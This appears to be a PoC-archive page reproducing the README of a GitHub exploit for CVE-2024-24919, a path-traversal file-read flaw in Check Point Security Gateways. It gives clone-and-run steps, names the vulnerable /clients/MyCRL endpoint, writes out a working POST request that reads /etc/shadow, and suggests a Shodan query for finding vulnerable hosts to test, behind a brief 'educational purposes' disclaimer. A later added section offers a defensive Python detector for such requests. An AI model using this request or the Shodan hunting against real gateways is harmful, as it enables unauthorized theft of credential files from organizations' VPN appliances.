PoC details: 5c5d70426f6b88f9a9e634704c9b605d4720010a

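Source
Related vulnerability
Title: Check Point Security Gateways security vulnerability (CVE-2024-24919)
Description: Check Point Security Gateways is an AI-powered NGFW security gateway from the Israeli company Check Point. Check Point Security Gateways contains a security vulnerability. An attacker can exploit this vulnerability to obtain sensitive information.
Description
 CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.
Introduction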
# CVE-2024-24919-Exploit

## Overview

This repository contains a Python exploit for CVE-2024-24919, a vulnerability that allows you to read sensitive files from the vulnerable page.

The exploit first checks whether the target is vulnerable, and then retrieves the file at the path you specify.

**Severity**: Critical

## Usage

First clone the repository:

    git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
    cd CVE-2024-24919-Exploit

Make the script executable and run it with python3:

    chmod +x exploit.py
    python3 exploit.py

Then follow the steps and you will get the contents of the file you specify.

If you are struggling, make sure the URL you specify is the main one:

✓ `https://google.com`

✘ `https://google.com/search?client=firefox`

## POC (Proof Of Concept)

First we need to make sure that the website is a Check Point Security Gateway that has Remote Access VPN or Mobile Access software enabled.

In this exploit we are pointing to the `{ip}/clients/MyCRL` endpoint.

This endpoint is vulnerable when we send a POST request whose body contains the string `CSHELL/` and the path of the file we want to read, using a path traversal.

The request will be something like this:

    POST /clients/MyCRL HTTP/1.1
    Host: <redacted>
    Content-Length: 39

    aCSHELL/../../../../../../../etc/shadow

We get all of this by looking at the source code.

For more information about the process check this post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
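
A defender-side check for the request shape described above, as an added example that is not part of the original repository: it flags POST requests to `/clients/MyCRL` whose body carries `CSHELL/` together with a traversal sequence. The function names, the sample requests and the percent-decoding step (a conservative generalization beyond the literal request on this page) are assumptions of this example.

```python
import re
from urllib.parse import unquote, urlsplit

ENDPOINT = "/clients/MyCRL"   # endpoint named on this page
MARKER = "CSHELL/"            # string the page says the body carries
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")  # "../" or "..\" segment


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, _version = parts
    return method.upper(), urlsplit(target).path, body.decode("latin-1")


def is_suspicious(raw: bytes) -> bool:
    """True when a request matches the pattern described for CVE-2024-24919."""
    try:
        method, path, body = parse_request(raw)
    except ValueError:
        return False
    if method != "POST" or unquote(path).rstrip("/") != ENDPOINT:
        return False
    # Decode twice so single- and double-encoded "../" are normalised (assumption).
    decoded = unquote(unquote(body))
    return MARKER in decoded and bool(TRAVERSAL.search(decoded))


# Constructed sample requests (not real traffic); gw.example is a placeholder host.
SAMPLES = {
    "page_example": b"POST /clients/MyCRL HTTP/1.1\r\nHost: gw.example\r\n"
                    b"Content-Length: 39\r\n\r\n"
                    b"aCSHELL/../../../../../../../etc/shadow",
    "encoded": b"POST /clients/MyCRL HTTP/1.1\r\nHost: gw.example\r\n\r\n"
               b"aCSHELL/%2e%2e%2f%2e%2e%2fetc/shadow",
    "benign_post": b"POST /clients/MyCRL HTTP/1.1\r\nHost: gw.example\r\n\r\n"
                   b"ordinary-body",
    "benign_get": b"GET /clients/MyCRL HTTP/1.1\r\nHost: gw.example\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {'ALERT' if is_suspicious(raw) else 'ok'}")
```

The same predicate can be applied to request bodies captured by a reverse proxy or WAF in front of the gateway; access logs that record only the request line will show the POST to `/clients/MyCRL` but not the body.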

## Test

If you want to test this vulnerability you can use Shodan to find some vulnerable websites, using this query in Shodan:

    Server: “Check Point SVN Foundation”


## Disclaimer
This script is for educational purposes only. Use it responsibly and only on systems you have permission to access.
File snapshot

    [4.0K] /data/pocs/5c5d70426f6b88f9a9e634704c9b605d4720010a
    ├── [3.1K] exploit.py
    └── [2.0K] README.md

    0 directories, 2 files